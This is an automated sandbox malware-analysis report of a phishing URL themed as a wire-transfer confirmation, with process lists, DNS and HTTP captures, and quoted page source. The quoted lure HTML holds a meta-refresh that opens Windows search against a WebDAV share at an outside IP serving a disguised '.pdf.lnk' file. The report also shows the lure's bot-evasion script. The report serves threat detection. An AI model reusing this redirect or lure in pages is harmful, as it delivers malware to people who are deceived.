Windows Analysis Report
https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65
Analysis ID:1426794
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Chrome launches external ms-search protocol handler (WebDAV)
Phishing site or detected (based on various text indicators)

Classification

  • System is w10x64
  • chrome.exe (PID: 1068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Phishing

Source: Chrome DOM: 0.0OCR Text: Wire Confirmation Receipt for your review Access document now . Received April 2024 . Reference NO ...F04122, Wire Confirmation / TN ...RP2784 . 1 Page. ACCESS HERE TO REVIEW FULL DOCUMENT NOW Cordialement, With kind regards, John Keshia Account Manager0486/09.55.81
Source: https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.htmlHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 89.23.107.240
Source: global trafficHTTP traffic detected: GET /van-chuyen-giao-nhan/ HTTP/1.1Host: tragiangoc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WireConfirmation_2004.10.2024.html HTTP/1.1Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tragiangoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-6d8650014e23489d8c6e14ca9312426a.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oDpGcPGGdcbSnd9&MD=hxMSsSOB HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /Wire%20Confirmation/WireConfirmation.pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: 89.23.107.240
Source: unknownDNS traffic detected: queries for: tragiangoc.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:25:26 GMTContent-Type: text/htmlContent-Length: 27242Connection: closeServer: cloudflareCF-RAY: 8754d83cb88f6755-ATL
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:26:18 GMTContent-Length: 9Content-Type: text/plain; charset=utf-8Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:26:19 GMTContent-Length: 9Content-Type: text/plain; charset=utf-8Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 14:26:21 GMTContent-Length: 9Content-Type: text/plain; charset=utf-8Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: chromecache_48.2.drString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_46.2.drString found in binary or memory: https://www.base64encode.org/
Source: chromecache_48.2.drString found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: classification engineClassification label: mal48.phis.evad.win@20/6@8/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1996,i,915152715888252964,5619724167490245158,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\89.23.107.240@80\Wire Confirmation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction

Source | Detection | Scanner | Label | Link
https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw | 0% | Virustotal | | Browse
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tragiangoc.com | 104.21.39.145 | true | false | | unknown
www.google.com | 64.233.185.147 | true | false | | high
pub-6d8650014e23489d8c6e14ca9312426a.r2.dev | 104.18.3.35 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/favicon.ico | false | | unknown
http://89.23.107.240/Wire%20Confirmation/WireConfirmation.pdf.lnk | true | | unknown
https://tragiangoc.com/van-chuyen-giao-nhan/ | false | | unknown
https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.html | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.base64encode.org/ | chromecache_46.2.dr | false | | high
https://www.cloudflare.com/favicon.ico | chromecache_48.2.dr | false | | high
https://developers.cloudflare.com/r2/data-access/public-buckets/ | chromecache_48.2.dr | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.18.3.35 | pub-6d8650014e23489d8c6e14ca9312426a.r2.dev | United States | | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
89.23.107.240 | unknown | Russian Federation | | 48687 | MAXITEL-ASRU | true
104.21.39.145 | tragiangoc.com | United States | | 13335 | CLOUDFLARENETUS | false
64.233.185.147 | www.google.com | United States | | 15169 | GOOGLEUS | false

IP
192.168.2.4

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1426794
                      Start date and time:2024-04-16 16:24:33 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:browseurl.jbs
                      Sample URL:https://www.bing.com/ck/a?!&&p=ec2690ecb5e8783cJmltdHM9MTcxMzA1MjgwMCZpZ3VpZD0zNmI1MjYyNC1hNGNjLTZiMzktMTE1Yi0zNjI3YTBjYzY1YmEmaW5zaWQ9NTIzMA&ptn=3&ver=2&hsh=3&fclid=36b52624-a4cc-6b39-115b-3627a0cc65ba&psq=site%3atragiangoc.com&u=a1aHR0cDovL3RyYWdpYW5nb2MuY29tL3Zhbi1jaHV5ZW4tZ2lhby1uaGFuLw
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:13
                      Number of new started drivers analysed:1
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal48.phis.evad.win@20/6@8/6
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Browse: search:query=WireConfirmation.pdf&crumb=location:\\89.23.107.240@80\Wire Confirmation\&displayname=Wire Confirmation
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, mrxdav.sys, dllhost.exe, rundll32.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 64.233.185.138, 64.233.185.102, 64.233.185.101, 64.233.185.100, 64.233.185.113, 64.233.185.139, 173.194.219.84, 142.250.9.94, 34.104.35.123, 13.107.21.200, 204.79.197.200, 199.232.210.172, 192.229.211.108, 108.177.122.94
                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, www-bing-com.dual-a-0001.a-msedge.net, update.googleapis.com, wwwprod.www-bing-com.akadns.net, clients.l.google.com
                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      No simulations
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (1071), with CRLF line terminators
                      Category:downloaded
                      Size (bytes):9417
                      Entropy (8bit):4.8408413919539495
                      Encrypted:false
                      SSDEEP:96:7r6CLPcRff+3uxBGvLeZvXfr4d1mM+ujrYaCnRbr/oePRW+T:yQPcRff+3uxBGvLSXj4d1X+ujrYaYHZ
                      MD5:D0B69729A3F8176707D12870EEF4534D
                      SHA1:967159D74588CFD28DC7E66F4644947E9B1C4AB7
                      SHA-256:CE4BE3829C5941215EA10C047E8AD2465A70C97135DA5C694831AAA61235AD8B
                      SHA-512:54647742434DD36F8AD95731253CFEC1DC73C51D63ADD21D682FDBF583426BCB1BD31235FF7427860EA5810E971912DBCA505939848A687BC6F8B9542ACC0F71
                      Malicious:false
                      Reputation:low
                      URL:https://tragiangoc.com/van-chuyen-giao-nhan/
                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta name="robots" content="noimageindex, nofollow, nosnippet, noindex, noarchive, nocache, notranslate, noyaca">.. <meta http-equiv="Content-Type" content="text/html; charset=us-ascii">.. <title></title>.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, user-scalable=yes">.. <script>.. function runBotDetection() {.. let documentDetectionKeys = ["webdriver", "_WEBDRIVER_ELEM_CACHE", "ChromeDriverw", "Geckowebdriver", "driver-evaluate", "webdriver-evaluate", "selenium-evaluate", "selenium-webdriver", "webdriverCommand", "webdriver-evaluate-response", "__webdriverFunc", "__$webdriverAsyncExecutor", "$wdc_asdjflasutopfhvcZLmcfl_", "__lastWatirAlert", "__lastWatirConfirm", "__lastWatirPrompt", "$chrome_asyncScriptInfo", "$cdc_asdjflasutopfhvcZLmcfl_", "__webdriver_evaluate", "__selenium_evaluate", "__webdriver_script_function", "__webdriver_script_func
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1435
                      Entropy (8bit):5.226781948576606
                      Encrypted:false
                      SSDEEP:24:hPRCrMxikpW5KHxM2YaoCS3DZPlP1S3wdhq7AkyFSY14X0:tzxikoMHL3vSzZPlP4wHh/Smw0
                      MD5:47114EABB690F96FD59EE4C17DDDCDE0
                      SHA1:631C086794BBF9A0D07B36DF31620B055A899C25
                      SHA-256:DBD779E8D4194BDA240BC6FC3F920DC95CF26EDCF193EABEE88791B2E7C0E8C9
                      SHA-512:0004D7E47382AB33F7084F112D5D73FDF25315579435F61223308EC7DB7FFC6B854627F559EA62C3AE0D93EB8B5D1900A1A1BF3F9AF046750218E2BDCDF3D1C9
                      Malicious:false
                      Reputation:low
                      URL:https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/WireConfirmation_2004.10.2024.html
                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="refresh" content="0; URL=search:query=WireConfirmation.pdf&amp;crumb=location:\\89.23.107.240@80\Wire Confirmation\&amp;displayname=Wire Confirmation">.. <title>Document</title>..</head>..<body style="text-align: center; font-size: 32px; font-weight: bold; line-height: 40px; font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;">.. <p style="color: #737373;">.. Wire Confirmation Receipt for your review.. </p> .. <p style="color: #3B5BDB;">.. Access document now<br/>.. . Received April 2024<br/>.. . Reference NO ...F04122, Wire Confirmation / TN ...RP2784<br/>.. . 1 Page.<br/>.. </p>.. <p>.. <a .. target="_blank".. style="color: #68AE34;"..
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:HTML document, ASCII text, with very long lines (611)
                      Category:downloaded
                      Size (bytes):27242
                      Entropy (8bit):4.3631679730758375
                      Encrypted:false
                      SSDEEP:384:6FamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:663Mp5If8WOmgW3
                      MD5:DF3D48946E8D3F5A83608308EDBB4B86
                      SHA1:47B9C40C97ABF2658DF96B1C06109324E15E1A00
                      SHA-256:570A6631252B8A52DF4DE0E953AE77DBDF524DFC3637CDA2840494A0D2B49499
                      SHA-512:36EC1CEC72DC3245730C813277C645525473CC5232E85CD23503B8593D90264F335E61A16D364A1E6C41922820B40BA7C0F46B19F4B91DB6A0CF5E31E778DDEA
                      Malicious:false
                      Reputation:low
                      URL:https://pub-6d8650014e23489d8c6e14ca9312426a.r2.dev/favicon.ico
                      Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                      No static file info
                      Timestamp | Source IP | Dest IP | Checksum | Code | Type
                      Apr 16, 2024 16:25:23.873995066 CEST | 192.168.2.4 | 1.1.1.1 | c204 | (Port unreachable) | Destination Unreachable
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Apr 16, 2024 16:25:23.723448992 CEST | 192.168.2.4 | 1.1.1.1 | 0xa184 | Standard query (0) | tragiangoc.com | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.723575115 CEST | 192.168.2.4 | 1.1.1.1 | 0x91e1 | Standard query (0) | tragiangoc.com | 65 | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.855133057 CEST | 192.168.2.4 | 1.1.1.1 | 0x9496 | Standard query (0) | tragiangoc.com | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.855242014 CEST | 192.168.2.4 | 1.1.1.1 | 0x2d21 | Standard query (0) | tragiangoc.com | 65 | IN (0x0001) | false
                      Apr 16, 2024 16:25:25.063254118 CEST | 192.168.2.4 | 1.1.1.1 | 0xa3ff | Standard query (0) | pub-6d8650014e23489d8c6e14ca9312426a.r2.dev | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:25.063776970 CEST | 192.168.2.4 | 1.1.1.1 | 0x8570 | Standard query (0) | pub-6d8650014e23489d8c6e14ca9312426a.r2.dev | 65 | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.420095921 CEST | 192.168.2.4 | 1.1.1.1 | 0xbe6b | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.420095921 CEST | 192.168.2.4 | 1.1.1.1 | 0x95a8 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Apr 16, 2024 16:25:23.852214098 CEST | 1.1.1.1 | 192.168.2.4 | 0x91e1 | No error (0) | tragiangoc.com |  |  | 65 | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.872196913 CEST | 1.1.1.1 | 192.168.2.4 | 0xa184 | No error (0) | tragiangoc.com |  | 104.21.39.145 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.872196913 CEST | 1.1.1.1 | 192.168.2.4 | 0xa184 | No error (0) | tragiangoc.com |  | 172.67.170.206 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.962443113 CEST | 1.1.1.1 | 192.168.2.4 | 0x9496 | No error (0) | tragiangoc.com |  | 104.21.39.145 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.962443113 CEST | 1.1.1.1 | 192.168.2.4 | 0x9496 | No error (0) | tragiangoc.com |  | 172.67.170.206 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:23.982563019 CEST | 1.1.1.1 | 192.168.2.4 | 0x2d21 | No error (0) | tragiangoc.com |  |  | 65 | IN (0x0001) | false
                      Apr 16, 2024 16:25:25.171405077 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3ff | No error (0) | pub-6d8650014e23489d8c6e14ca9312426a.r2.dev |  | 104.18.3.35 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:25.171405077 CEST | 1.1.1.1 | 192.168.2.4 | 0xa3ff | No error (0) | pub-6d8650014e23489d8c6e14ca9312426a.r2.dev |  | 104.18.2.35 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524800062 CEST | 1.1.1.1 | 192.168.2.4 | 0x95a8 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524833918 CEST | 1.1.1.1 | 192.168.2.4 | 0xbe6b | No error (0) | www.google.com |  | 64.233.185.147 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524833918 CEST | 1.1.1.1 | 192.168.2.4 | 0xbe6b | No error (0) | www.google.com |  | 64.233.185.106 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524833918 CEST | 1.1.1.1 | 192.168.2.4 | 0xbe6b | No error (0) | www.google.com |  | 64.233.185.104 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524833918 CEST | 1.1.1.1 | 192.168.2.4 | 0xbe6b | No error (0) | www.google.com |  | 64.233.185.99 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524833918 CEST | 1.1.1.1 | 192.168.2.4 | 0xbe6b | No error (0) | www.google.com |  | 64.233.185.105 | A (IP address) | IN (0x0001) | false
                      Apr 16, 2024 16:25:26.524833918 CEST | 1.1.1.1 | 192.168.2.4 | 0xbe6b | No error (0) | www.google.com |  | 64.233.185.103 | A (IP address) | IN (0x0001) | false
                      • tragiangoc.com
                      • https:
                        • pub-6d8650014e23489d8c6e14ca9312426a.r2.dev
                      • fs.microsoft.com
                      • slscr.update.microsoft.com
                      • 89.23.107.240
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49751 | 89.23.107.240 | 80 | 1068 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:11.703726053 CEST | 102 | OUT | OPTIONS / HTTP/1.1
                      Connection: Keep-Alive
                      User-Agent: DavClnt
                      translate: f
                      Host: 89.23.107.240
                      Apr 16, 2024 16:26:11.916481018 CEST | 177 | IN | HTTP/1.1 200 OK
                      Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                      Dav: 1, 2
                      Ms-Author-Via: DAV
                      Date: Tue, 16 Apr 2024 14:26:11 GMT
                      Content-Length: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49752 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:15.308476925 CEST | 151 | OUT | OPTIONS /Wire%20Confirmation HTTP/1.1
                      Connection: Keep-Alive
                      User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                      translate: f
                      Host: 89.23.107.240
                      Apr 16, 2024 16:26:15.521508932 CEST | 177 | IN | HTTP/1.1 200 OK
                      Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                      Dav: 1, 2
                      Ms-Author-Via: DAV
                      Date: Tue, 16 Apr 2024 14:26:15 GMT
                      Content-Length: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49753 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
                      Apr 16, 2024 16:26:16.285233021 CEST | 181 | OUT
                      Data Ascii: PROPFIND /Wire%20Confirmation HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: 89.23.107.240
                      Apr 16, 2024 16:26:16.499742031 CEST | 683 | IN | HTTP/1.1 207 Multi-Status
                      Content-Type: text/xml; charset=utf-8
                      Date: Tue, 16 Apr 2024 14:26:16 GMT
                      Content-Length: 557
                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/Wire%20Confirmation/</D:href><D:propstat><D:prop><D:displayname>Wire Confirmation</D:displayname><D:getlastmodified>Sun, 14 Apr 2024 23:02:07 GMT</D:getlastmodified><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.4 | 49755 | 89.23.107.240 | 80 |  |
                      Timestamp | Bytes transferred | Direction | Data
